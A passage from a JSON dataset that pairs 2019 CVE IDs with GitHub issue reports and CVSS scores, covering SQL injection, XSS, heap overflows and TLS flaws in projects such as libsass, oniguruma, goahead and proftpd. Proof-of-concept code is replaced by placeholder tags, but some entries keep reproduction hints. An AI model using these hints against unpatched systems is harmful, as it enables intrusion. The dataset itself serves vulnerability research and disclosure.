  40357. "Issue_Url_new": "https://github.com/wwbn/avideo/issues/2202",
  40358. "Repo_new": "wwbn/avideo",
  40359. "Issue_Created_At": "2019-10-31T18:26:26Z",
  40360. "description": "SQL Injection in APITAG plugin. User input passed through the \"live_stream_code\" POST parameter to PATHTAG is not properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to e.g. read sensitive data from the database through in band SQL Injection attacks. Successful exploitation of this vulnerability requires the APITAG Chat\" plugin to be enabled. Proof of Concept: ERRORTAG",
  40361. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40362. "severity": "CRITICAL",
  40363. "baseScore": 9.8,
  40364. "impactScore": 5.9,
  40365. "exploitabilityScore": 3.9
  40366. },
  40367. {
  40368. "CVE_ID": "CVE-2019-18797",
  40369. "Issue_Url_old": "https://github.com/sass/libsass/issues/3000",
  40370. "Issue_Url_new": "https://github.com/sass/libsass/issues/3000",
  40371. "Repo_new": "sass/libsass",
  40372. "Issue_Created_At": "2019-10-07T14:44:16Z",
  40373. "description": "Stack Overflow in sassc. We found Stack Overflow in sassc binary and sassc is complied with clang enabling ASAN. Machine Setup APITAG Complilation : CC=afl clang fast CXX=afl clang fast++ AFL_USE_ASAN NUMBERTAG make C sassc j4 POC : FILETAG ASAN Output ERRORTAG",
  40374. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40375. "severity": "MEDIUM",
  40376. "baseScore": 6.5,
  40377. "impactScore": 3.6,
  40378. "exploitabilityScore": 2.8
  40379. },
  40380. {
  40381. "CVE_ID": "CVE-2019-18798",
  40382. "Issue_Url_old": "https://github.com/sass/libsass/issues/2999",
  40383. "Issue_Url_new": "https://github.com/sass/libsass/issues/2999",
  40384. "Repo_new": "sass/libsass",
  40385. "Issue_Created_At": "2019-10-07T14:36:59Z",
  40386. "description": "Heap Buffer Overflow in sassc. We found vulnerability in sassc binary and sassc is complied with clang enabling ASAN. Machine Setup CODETAG ASAN Output ERRORTAG",
  40387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40388. "severity": "MEDIUM",
  40389. "baseScore": 6.5,
  40390. "impactScore": 3.6,
  40391. "exploitabilityScore": 2.8
  40392. },
  40393. {
  40394. "CVE_ID": "CVE-2019-18799",
  40395. "Issue_Url_old": "https://github.com/sass/libsass/issues/3001",
  40396. "Issue_Url_new": "https://github.com/sass/libsass/issues/3001",
  40397. "Repo_new": "sass/libsass",
  40398. "Issue_Created_At": "2019-10-07T14:51:08Z",
  40399. "description": "SEGV in sassc. We found Heap Buffer Overflow in sassc binary and sassc is complied with clang enabling ASAN. Machine Setup APITAG Complilation : CC=afl clang fast CXX=afl clang fast++ AFL_USE_ASAN NUMBERTAG make C sassc j4 POC : FILETAG ASAN Output ERRORTAG",
  40400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40401. "severity": "MEDIUM",
  40402. "baseScore": 6.5,
  40403. "impactScore": 3.6,
  40404. "exploitabilityScore": 2.8
  40405. },
  40406. {
  40407. "CVE_ID": "CVE-2019-18815",
  40408. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/22",
  40409. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/22",
  40410. "Repo_new": "popojicms/popojicms",
  40411. "Issue_Created_At": "2019-10-19T06:27:43Z",
  40412. "description": "Open Redirection Vulnerability. Hi, MENTIONTAG and I found open redirection vulnerability on the APITAG The vulnerable code is on FILETAG file line number NUMBERTAG FILETAG",
  40413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40414. "severity": "MEDIUM",
  40415. "baseScore": 6.1,
  40416. "impactScore": 2.7,
  40417. "exploitabilityScore": 2.8
  40418. },
  40419. {
  40420. "CVE_ID": "CVE-2019-18816",
  40421. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/21",
  40422. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/21",
  40423. "Repo_new": "popojicms/popojicms",
  40424. "Issue_Created_At": "2019-10-18T17:21:47Z",
  40425. "description": "Stored XSS on Post feature. Hi, MENTIONTAG and I found a stored XSS vulnerability on the Post feature. By intercepting the request, we are able to edit the request body to insert a XSS payload. FILETAG",
  40426. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40427. "severity": "MEDIUM",
  40428. "baseScore": 6.1,
  40429. "impactScore": 2.7,
  40430. "exploitabilityScore": 2.8
  40431. },
  40432. {
  40433. "CVE_ID": "CVE-2019-18817",
  40434. "Issue_Url_old": "https://github.com/istio/istio/issues/18229",
  40435. "Issue_Url_new": "https://github.com/istio/istio/issues/18229",
  40436. "Repo_new": "istio/istio",
  40437. "Issue_Created_At": "2019-10-23T15:46:28Z",
  40438. "description": "Istio Sidecar consuming high CPU Istio NUMBERTAG Bug description We are running Istio NUMBERTAG this also happend on NUMBERTAG most of our applications are running fine. However, in one of our deployments the CPU on the sidecar is pegged at NUMBERTAG for the life of the pod. This happens for the majority of the pods in the same deployment but not all. The pod contains nginx, istio proxy and an application container all of which have normal CPU use except istio proxy. I turned on debugging on the sidecar however there are not really interesting. CODETAG I was able to collect an strace from the PID of the problematic pod ERRORTAG Here is the output of kubectl n $namespace exec it $pod c istio proxy top on a pod with busy envoy ERRORTAG strace f r p NUMBERTAG ERRORTAG There has been a forum thread about it, but this is now ongoing without any resolution. So far the only workaround has been to downgrade the sidecar to NUMBERTAG URLTAG Any ideas on how I can troubleshoot further? Affected product area (please put an X in all that apply) ] Configuration Infrastructure [ ] Docs [ ] Installation [ ] Networking [x ] Performance and Scalability [ ] Policies and Telemetry [ ] Security [ ] Test and Release [ ] User Experience [ ] Developer Infrastructure Expected behavior CPU not going high Steps to reproduce the bug Unable to reproduce Version (include the output of APITAG and kubectl version ) citadel version NUMBERTAG galley version NUMBERTAG ingressgateway version NUMBERTAG pilot version NUMBERTAG policy version NUMBERTAG sidecar injector version NUMBERTAG telemetry version NUMBERTAG How was Istio installed? helm chart Environment where bug was observed (cloud vendor, OS, etc) amazon eks Additionally, please consider attaching a [cluster state archive CVETAG by attaching the dump file to this issue.",
  40439. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40440. "severity": "HIGH",
  40441. "baseScore": 7.5,
  40442. "impactScore": 3.6,
  40443. "exploitabilityScore": 3.9
  40444. },
  40445. {
  40446. "CVE_ID": "CVE-2019-18840",
  40447. "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2555",
  40448. "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2555",
  40449. "Repo_new": "wolfssl/wolfssl",
  40450. "Issue_Created_At": "2019-11-04T17:01:40Z",
  40451. "description": "Heap based buffer overflow while parsing crafted NUMBERTAG certificates. APITAG in versions NUMBERTAG and NUMBERTAG incorrectly handles NUMBERTAG certificates leading to a heap buffer overflow inside the APITAG structure, overwriting a NULL pointer and as a result crash during memory deallocation. This vulnerability affects both client and server in two supported protocols: TLS and DTLS. During processing of a crafted certificate, APITAG incorrectly handles the loc buffer in the APITAG structure. In the following line the count variable reaches value NUMBERTAG while the loc table has fixed size NUMBERTAG PATHTAG > > APITAG >loc FILETAG",
  40452. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40453. "severity": "HIGH",
  40454. "baseScore": 7.5,
  40455. "impactScore": 3.6,
  40456. "exploitabilityScore": 3.9
  40457. },
  40458. {
  40459. "CVE_ID": "CVE-2019-18841",
  40460. "Issue_Url_old": "https://github.com/ankane/chartkick.js/issues/117",
  40461. "Issue_Url_new": "https://github.com/ankane/chartkick.js/issues/117",
  40462. "Repo_new": "ankane/chartkick.js",
  40463. "Issue_Created_At": "2019-11-10T00:11:31Z",
  40464. "description": "Prototype Pollution in FILETAG NUMBERTAG Under certain conditions, the NUMBERTAG series of FILETAG is vulnerable to prototype pollution. This is same type of issue that was announced for APITAG URLTAG and other popular libraries earlier this year. APITAG rated this a \"minor vulnerability\" URLTAG . It's certainly unintended behavior, but since FILETAG is a client side only library, its impact is likely limited. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG to NUMBERTAG Fixed Versions NUMBERTAG ersions Unaffected NUMBERTAG Impact Passing untrusted input to APITAG and the result to FILETAG can pollute APITAG . CODETAG A specially crafted response in data loaded via URL can cause pollution well. APITAG All users running an affected release should upgrade immediately.",
  40465. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  40466. "severity": "HIGH",
  40467. "baseScore": 7.3,
  40468. "impactScore": 3.4,
  40469. "exploitabilityScore": 3.9
  40470. },
  40471. {
  40472. "CVE_ID": "CVE-2019-18844",
  40473. "Issue_Url_old": "https://github.com/projectacrn/acrn-hypervisor/issues/3252",
  40474. "Issue_Url_new": "https://github.com/projectacrn/acrn-hypervisor/issues/3252",
  40475. "Repo_new": "projectacrn/acrn-hypervisor",
  40476. "Issue_Created_At": "2019-06-12T08:24:06Z",
  40477. "description": "Assert usages issue in device model from KW work.. Assert usages issue in device model from KW work.",
  40478. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40479. "severity": "HIGH",
  40480. "baseScore": 7.5,
  40481. "impactScore": 3.6,
  40482. "exploitabilityScore": 3.9
  40483. },
  40484. {
  40485. "CVE_ID": "CVE-2019-18850",
  40486. "Issue_Url_old": "https://github.com/trustedsec/trevorc2/issues/18",
  40487. "Issue_Url_new": "https://github.com/trustedsec/trevorc2/issues/18",
  40488. "Repo_new": "trustedsec/trevorc2",
  40489. "Issue_Created_At": "2019-12-03T17:36:59Z",
  40490. "description": "APITAG NUMBERTAG Fingerprinting Vulnerability. APITAG NUMBERTAG fails to prevent fingerprinting primarily via a discrepancy between response headers when responding to different HTTP methods, also via predictible unique responses when accessing and interacting with the \"SITE_PATH_QUERY\". CVETAG Gionathan Armando Reale, Deloitte DK",
  40491. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  40492. "severity": "HIGH",
  40493. "baseScore": 7.5,
  40494. "impactScore": 3.6,
  40495. "exploitabilityScore": 3.9
  40496. },
  40497. {
  40498. "CVE_ID": "CVE-2019-18954",
  40499. "Issue_Url_old": "https://github.com/NetEase/pomelo/issues/1149",
  40500. "Issue_Url_new": "https://github.com/netease/pomelo/issues/1149",
  40501. "Repo_new": "netease/pomelo",
  40502. "Issue_Created_At": "2019-11-08T00:04:23Z",
  40503. "description": "A vulnerability in pomelo. We found that pomelo allows external control of critical state data. A malicious user input can corrupt arbitrary methods and attributes in PATHTAG because certain internal attributes can be overwritten via a conflicting name. Hence, a malicious attacker can launch attacks by adding additional attributes to user input. A detailed discussion of the vulnerability can be found here.",
  40504. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  40505. "severity": "MEDIUM",
  40506. "baseScore": 5.3,
  40507. "impactScore": 1.4,
  40508. "exploitabilityScore": 3.9
  40509. },
  40510. {
  40511. "CVE_ID": "CVE-2019-18960",
  40512. "Issue_Url_old": "https://github.com/firecracker-microvm/firecracker/issues/1462",
  40513. "Issue_Url_new": "https://github.com/firecracker-microvm/firecracker/issues/1462",
  40514. "Repo_new": "firecracker-microvm/firecracker",
  40515. "Issue_Created_At": "2019-12-09T22:22:37Z",
  40516. "description": "Firecracker vsock implementation buffer overflow in versions NUMBERTAG and NUMBERTAG that can result in potentially exploitable crashes.. We have identified an issue in the Firecracker NUMBERTAG and NUMBERTAG sock implementation. Issue Description A logical error in bounds checking performed on vsock virtio descriptors can be used by a malicious guest to read from and write to a segment of the host side Firecracker process' heap address space, directly after the end of a guest memory region. For reads, the accessible segment's size is NUMBERTAG APITAG For writes, the accessible segment is limited by the host Linux kernel to a size defined in APITAG . We expect the value of APITAG to be on the order of a few hundred APITAG to a few APITAG Impact This will generally result in a segmentation fault, but remote code execution within the Firecracker host side process context cannot be ruled out. Vulnerable Systems Only Firecracker NUMBERTAG and NUMBERTAG are affected. Only Firecracker APITAG with configured vsock devices are affected, and only if one or more vsock devices are in active use by both host and guest. In a remote code execution scenario, users running Firecracker in line with the recommended Production Host Setup will see the impact limited as follows: a malicious APITAG guest that would manage to compromise the Firecracker VMM process would be restricted to running on the host as an unprivileged user, in a chroot and mount namespace isolated from the host's filesystem, in a separate pid namespace, in a separate network namespace, with system calls limited to Firecracker's seccomp whitelist, on a single NUMA node, and on a cgroups limited number of CPU cores. Mitigation Firecracker NUMBERTAG and Firecracker NUMBERTAG released on NUMBERTAG addresses this issue. The fix has also been applied to Firecracker's master branch. If you are using Firecracker NUMBERTAG or NUMBERTAG we recommend you update to NUMBERTAG or NUMBERTAG as soon as possible. If you are using Firecracker NUMBERTAG or below, you do not need to take any action. In a remote code execution scenario, users running Firecracker in line with the recommended Production Host Setup will limit the impact to the attacker's Firecracker process NUMBERTAG FILETAG NUMBERTAG FILETAG",
  40517. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40518. "severity": "CRITICAL",
  40519. "baseScore": 9.8,
  40520. "impactScore": 5.9,
  40521. "exploitabilityScore": 3.9
  40522. },
  40523. {
  40524. "CVE_ID": "CVE-2019-19012",
  40525. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/164",
  40526. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/164",
  40527. "Repo_new": "kkos/oniguruma",
  40528. "Issue_Created_At": "2019-11-08T11:05:59Z",
  40529. "description": "Integer overflow related to reg >dmax in search_in_range (regexec.c). Hello, I found an integer overflow in search_in_range at APITAG CODETAG reg >dmax is max repeat num, whose type is unsigned int. ONIG_MAX_REPEAT_NUM is NUMBERTAG but it can be multiplied into a very large number with distance_multiply at: CODETAG And Sch_range is a pointer. So if compiled in NUMBERTAG bit, sch_range += reg >dmax results into integer overflow. There should be other places related to reg >dmax/dmin which are vulnerable to integer overflow. APITAG ERRORTAG Compilation: CODETAG Output with pattern NUMBERTAG and string = x: ERRORTAG In sunday_quick_search, the APITAG gets crashed because p points to an invalid memory address. If it does not crash, p luckily points to a valid memory address. That it crashes or does not crash depends on the supplied pattern. This bug at least can be used to detect if the target system is NUMBERTAG bit or not. And if the target system is NUMBERTAG bit, is the KASLR is enable or not (constantly crashes or constantly no crashes means no KASLR). Thanks & Regards, Nguy\u1ec5n \u0110\u1ee9c M\u1ea1nh [E] v. EMAILTAG",
  40530. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40531. "severity": "CRITICAL",
  40532. "baseScore": 9.8,
  40533. "impactScore": 5.9,
  40534. "exploitabilityScore": 3.9
  40535. },
  40536. {
  40537. "CVE_ID": "CVE-2019-19040",
  40538. "Issue_Url_old": "https://github.com/kairosdb/kairosdb/issues/569",
  40539. "Issue_Url_new": "https://github.com/kairosdb/kairosdb/issues/569",
  40540. "Repo_new": "kairosdb/kairosdb",
  40541. "Issue_Created_At": "2019-10-24T21:22:52Z",
  40542. "description": "Reflect Cross site Scripting on error message (WEB UI / FILETAG , APITAG Hello, I want to report a Reflect Cross site scripting issue on APITAG . Vulnerability A function call on FILETAG , Line NUMBERTAG URLTAG will append error message by ERRORTAG function. ERRORTAG function was declared in FILETAG The error message will append to html without any escape. ERRORTAG So we can create a malicious error query and then trigger the XSS easily: APITAG APITAG FILETAG ) Fix You can escape the malicious code or fix with url encode APITAG before append to html. Best Regards.",
  40543. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40544. "severity": "MEDIUM",
  40545. "baseScore": 6.1,
  40546. "impactScore": 2.7,
  40547. "exploitabilityScore": 2.8
  40548. },
  40549. {
  40550. "CVE_ID": "CVE-2019-19084",
  40551. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5971",
  40552. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5971",
  40553. "Repo_new": "octopusdeploy/issues",
  40554. "Issue_Created_At": "2019-11-05T04:10:15Z",
  40555. "description": "Placeholder Issue. Details coming soon URLTAG",
  40556. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  40557. "severity": "MEDIUM",
  40558. "baseScore": 4.3,
  40559. "impactScore": 1.4,
  40560. "exploitabilityScore": 2.8
  40561. },
  40562. {
  40563. "CVE_ID": "CVE-2019-19085",
  40564. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5961",
  40565. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5961",
  40566. "Repo_new": "octopusdeploy/issues",
  40567. "Issue_Created_At": "2019-11-04T04:11:46Z",
  40568. "description": "Placeholder Issue. Details coming soon URLTAG",
  40569. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  40570. "severity": "MEDIUM",
  40571. "baseScore": 5.4,
  40572. "impactScore": 2.7,
  40573. "exploitabilityScore": 2.3
  40574. },
  40575. {
  40576. "CVE_ID": "CVE-2019-19113",
  40577. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/1",
  40578. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/1",
  40579. "Repo_new": "newbee-ltd/newbee-mall",
  40580. "Issue_Created_At": "2019-10-19T16:20:39Z",
  40581. "description": "SQL Injection in APITAG . PATHTAG CODETAG Where ${keyword} is used for splicing sql statements, there is a risk of SQL injection. poc\uff1a > URLTAG We will find a sql error, which proves that the vulnerability already exists.",
  40582. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40583. "severity": "CRITICAL",
  40584. "baseScore": 9.8,
  40585. "impactScore": 5.9,
  40586. "exploitabilityScore": 3.9
  40587. },
  40588. {
  40589. "CVE_ID": "CVE-2019-19203",
  40590. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/163",
  40591. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/163",
  40592. "Repo_new": "kkos/oniguruma",
  40593. "Issue_Created_At": "2019-11-06T09:39:01Z",
  40594. "description": "heap buffer overflow in gb NUMBERTAG mbc_enc_len. In gb NUMBERTAG mbc_enc_len, p ++ then p is dereferenced without checking if it passes the end of string, which leads to heap buffer overflow. CODETAG APITAG ERRORTAG Compilation: CODETAG Output of APITAG ERRORTAG",
  40595. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40596. "severity": "HIGH",
  40597. "baseScore": 7.5,
  40598. "impactScore": 3.6,
  40599. "exploitabilityScore": 3.9
  40600. },
  40601. {
  40602. "CVE_ID": "CVE-2019-19204",
  40603. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/162",
  40604. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/162",
  40605. "Repo_new": "kkos/oniguruma",
  40606. "Issue_Created_At": "2019-11-06T07:43:08Z",
  40607. "description": "heap buffer overflow in fetch_interval_quantifier due to double PFETCH. At APITAG in fetch_interval_quantifier, PFETCH is called without checking PEND: APITAG This leads to heap buffer overflow. APITAG ERRORTAG Compilation of oniguruma and APITAG APITAG Output of APITAG ERRORTAG",
  40608. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40609. "severity": "HIGH",
  40610. "baseScore": 7.5,
  40611. "impactScore": 3.6,
  40612. "exploitabilityScore": 3.9
  40613. },
  40614. {
  40615. "CVE_ID": "CVE-2019-19221",
  40616. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1276",
  40617. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1276",
  40618. "Repo_new": "libarchive/libarchive",
  40619. "Issue_Created_At": "2019-11-07T03:40:18Z",
  40620. "description": "bsdtar: An error in APITAG (archive_string.c) allows out of bounds read memory access and subsequently cause a crash. bsdtar: An error in APITAG (archive_string.c) triggers an out of bounds read memory access that results into a crash, via a specially crafted archive file. This bug was found using our custom fuzzer. Basic Information: Version of libarchive: libarchive NUMBERTAG libarchive NUMBERTAG dev How you obtained it: build from source libarchive NUMBERTAG tar.gz ( URLTAG libarchive NUMBERTAG dev ( URLTAG Tested operating system and version: Linu NUMBERTAG generic NUMBERTAG Tested compilers versions: gcc (version NUMBERTAG and clang (version NUMBERTAG ubuntu2) What other files were involved? To trigger the bug, the crashing input file (crash_file NUMBERTAG is attached with this report. ============ Command to reproduce the bug using valgrind: $ valgrind v ./bsdtar t f crash_file NUMBERTAG Output (partial): ERRORTAG Possible cause: In APITAG (archive_string.c): CODETAG APITAG function is called with the following parameter values: wcs_length NUMBERTAG mbs_length NUMBERTAG mbs NUMBERTAG ffff6a NUMBERTAG ffe NUMBERTAG r = mbrtowc(wcs, mbs, wcs_length, &shift_state); Here, \"mbs\" has a length of NUMBERTAG byte, while, APITAG tends to read NUMBERTAG bytes (wcs_length NUMBERTAG thus resulting into memory out of bounds read. The program crashes due to memory access violation, which can cause denial of service. The values {wcs_length NUMBERTAG mbs_length NUMBERTAG are reached, if return value of APITAG is r NUMBERTAG or r NUMBERTAG in the previous iteration of the while loop. \"mbs\" pointer increases (++mbs), and \"mbs_length\" length decreases ( mbs_length), but wcs_length remains constant NUMBERTAG bytes in this case).",
  40621. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40622. "severity": "MEDIUM",
  40623. "baseScore": 5.5,
  40624. "impactScore": 3.6,
  40625. "exploitabilityScore": 1.8
  40626. },
  40627. {
  40628. "CVE_ID": "CVE-2019-19240",
  40629. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/290",
  40630. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/290",
  40631. "Repo_new": "embedthis/goahead",
  40632. "Issue_Created_At": "2019-11-22T02:06:21Z",
  40633. "description": "APITAG information disclosure. Overview A security vulnerability affecting APITAG versions up to, and including NUMBERTAG has been identified. This bulletin discusses this flaw and its implications. Summary The APITAG function is vulnerable to very long host names which may cause unwanted disclosure of internal APITAG data. Discussion The APITAG web server has a vulnerability in processing redirected HTTP requests when supplied with a very large Host header. The APITAG APITAG uses a static host buffer of limited length. This can overflow with redirected requests when provided with a very long HTTP Host header. This can cause a copy of the host header to fail leaving the static host buffer uninitialized which may leak uninitialized data in the response. Threat Scope Versions up to and including NUMBERTAG Remedy Upgrade to NUMBERTAG or later. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG . References APITAG Issue URLTAG CVE CVE TBD Thanks Thanks to Shuai Zhang and from Dbappsecurity.",
  40634. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40635. "severity": "MEDIUM",
  40636. "baseScore": 5.3,
  40637. "impactScore": 1.4,
  40638. "exploitabilityScore": 3.9
  40639. },
  40640. {
  40641. "CVE_ID": "CVE-2019-19240",
  40642. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/289",
  40643. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/289",
  40644. "Repo_new": "embedthis/goahead",
  40645. "Issue_Created_At": "2019-11-22T01:59:04Z",
  40646. "description": "APITAG disclosure with large host names. In function APITAG it doesn\u2019t check the return value of scopy in line NUMBERTAG goahead version NUMBERTAG if the length of host is more than ME_GOAHEAD_LIMIT_STRING NUMBERTAG it will fail to copy the host string and will cause hostbuf uninitialized. And then the hostbuf will be added into uri and will be printed in line NUMBERTAG It might leak the stack address, heap address and libc address in the stack. APITAG versions NUMBERTAG and NUMBERTAG up to NUMBERTAG All hardware platforms. To reproduce, provide a very long hostname in the HTTP headers. FILETAG",
  40647. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40648. "severity": "MEDIUM",
  40649. "baseScore": 5.3,
  40650. "impactScore": 1.4,
  40651. "exploitabilityScore": 3.9
  40652. },
  40653. {
  40654. "CVE_ID": "CVE-2019-19269",
  40655. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/861",
  40656. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/861",
  40657. "Repo_new": "proftpd/proftpd",
  40658. "Issue_Created_At": "2019-11-04T16:10:29Z",
  40659. "description": "APITAG (nullptr dereference NUMBERTAG with CRLs in mod_tls of APITAG master HEAD. This is the NUMBERTAG th of NUMBERTAG bugs in the APITAG function. The code fails to take into account an empty CRL, for which APITAG returned NULL in my tests. It proceeds to dereferencing the NULL pointer, crashing the application. My patch is as follows: CODETAG Both of the other code bases which I noticed were getting the issuer CRL lookup right (second bug, issue NUMBERTAG fail to check the return value against NULL as well: FILETAG FILETAG (outdated stunnel NUMBERTAG FWIW NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . I hit this crash in the summer of NUMBERTAG after fixing the first crash (issue NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package against APITAG NUMBERTAG I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
  40660. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
  40661. "severity": "MEDIUM",
  40662. "baseScore": 4.9,
  40663. "impactScore": 3.6,
  40664. "exploitabilityScore": 1.2
  40665. },
  40666. {
  40667. "CVE_ID": "CVE-2019-19270",
  40668. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/859",
  40669. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/859",
  40670. "Repo_new": "proftpd/proftpd",
  40671. "Issue_Created_At": "2019-11-04T16:08:50Z",
  40672. "description": "Improper TLS CRL handling NUMBERTAG in mod_tls of APITAG master HEAD. This is the NUMBERTAG nd of NUMBERTAG bugs in the APITAG function. The code fails to perform a CRL lookup by issuer (as the comment right above the block states), it instead performs a second lookup by subject. As a result, in our tests, after crash bugs NUMBERTAG and NUMBERTAG issue NUMBERTAG and issue NUMBERTAG were fixed, APITAG still failed to take into account a valid CRL and break a connection. The patch is as follows: CODETAG At least two other pieces of similar code, which contain the same comment as this one, are getting it right: FILETAG FILETAG (outdated stunnel NUMBERTAG FWIW NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . I hit this issue in the summer of NUMBERTAG after fixing the two crashes (issue NUMBERTAG and issue NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package against APITAG NUMBERTAG I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
  40673. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  40674. "severity": "HIGH",
  40675. "baseScore": 7.5,
  40676. "impactScore": 3.6,
  40677. "exploitabilityScore": 3.9
  40678. },
  40679. {
  40680. "CVE_ID": "CVE-2019-19271",
  40681. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/860",
  40682. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/860",
  40683. "Repo_new": "proftpd/proftpd",
  40684. "Issue_Created_At": "2019-11-04T16:09:38Z",
  40685. "description": "Improper TLS CRL handling NUMBERTAG in mod_tls of APITAG NUMBERTAG For tracking purposes (this problem is fixed in NUMBERTAG This is the NUMBERTAG rd of NUMBERTAG bugs in the APITAG function. The wrong iteration variable is passed to APITAG probably causing some CRL entries to be ignored. From the NUMBERTAG branches diff: CODETAG FWIW as well NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . I didn't hit this issue in the summer of NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package, because the set of test CRLs only contained CRLs revoking at most one certificate, but I noticed it in the NUMBERTAG diff. I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
  40686. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  40687. "severity": "HIGH",
  40688. "baseScore": 7.5,
  40689. "impactScore": 3.6,
  40690. "exploitabilityScore": 3.9
  40691. },
  40692. {
  40693. "CVE_ID": "CVE-2019-19272",
  40694. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/858",
  40695. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/858",
